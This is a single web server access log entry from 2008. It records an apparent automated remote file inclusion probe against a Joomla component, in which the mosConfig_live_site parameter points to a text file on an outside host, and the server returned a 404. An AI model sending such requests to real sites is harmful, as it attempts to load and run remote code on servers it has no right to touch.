211.233.63.186 - - [06/Jan/2008:22:22:40 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
